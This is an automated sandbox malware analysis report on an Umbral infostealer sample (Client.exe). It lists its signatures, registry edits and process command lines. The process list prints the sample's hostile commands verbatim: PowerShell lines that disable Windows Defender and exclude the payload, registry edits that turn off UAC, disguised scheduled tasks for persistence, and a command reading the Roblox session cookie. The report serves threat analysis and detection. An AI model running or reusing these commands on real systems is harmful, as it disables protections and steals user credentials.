Malware Analysis Report

2024-10-10 10:00

Sample ID: 240615-rxx4asxgmj
Target: Client.exe
SHA256: 88cf131986bedc03a33d12ea5392ce09f521d40a056b8576a34ee613f36479e5
Tags: umbral evasion execution persistence spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 88cf131986bedc03a33d12ea5392ce09f521d40a056b8576a34ee613f36479e5

Threat Level: Known bad

The file Client.exe was found to be: Known bad.

Malicious Activity Summary

umbral evasion execution persistence spyware stealer trojan

Detect Umbral payload

Modifies WinLogon for persistence

UAC bypass

Umbral

Contains code to disable Windows Defender

Modifies Windows Defender Real-time Protection settings

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Modifies AppInit DLL entries

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Windows security modification

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks whether UAC is enabled

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Checks SCSI registry key(s)

Views/modifies file attributes

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Detects videocard installed

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

System policy modification

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-15 14:34

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-15 14:34
Reported: 2024-06-15 14:37
Platform: win10v2004-20240611-en
Max time kernel: 149s
Max time network: 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A (×2)

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\xdwdMicrosoft Azure DevOps.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Umbral

stealer umbral

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×2)

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A

Modifies AppInit DLL entries

persistence

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A (×48)
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×7)
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A (×5)

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Local\\xdwdGreenshot.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A (×2)

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A (×34)

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (×14)
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A (×6)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (×5)
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A (×20)
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A (×2)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (×17)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (×64)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (×64)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2516 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 3172 wrote to memory of 4808 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 1064 wrote to memory of 3652 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 2668 wrote to memory of 4200 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 2344 wrote to memory of 548 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 3428 wrote to memory of 3240 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 4720 wrote to memory of 2464 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 5024 wrote to memory of 1104 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 3196 wrote to memory of 3216 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 2012 wrote to memory of 1252 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 3528 wrote to memory of 744 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 1908 wrote to memory of 3636 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 3672 wrote to memory of 4264 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (×2)
PID 2516 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 4068 wrote to memory of 3040 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe (×2)
PID 4624 wrote to memory of 1320 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe (×2)
PID 2516 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\cmd.exe (×2)
PID 4560 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (×2)
PID 832 wrote to memory of 4872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe (×2)

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\CMD.exe

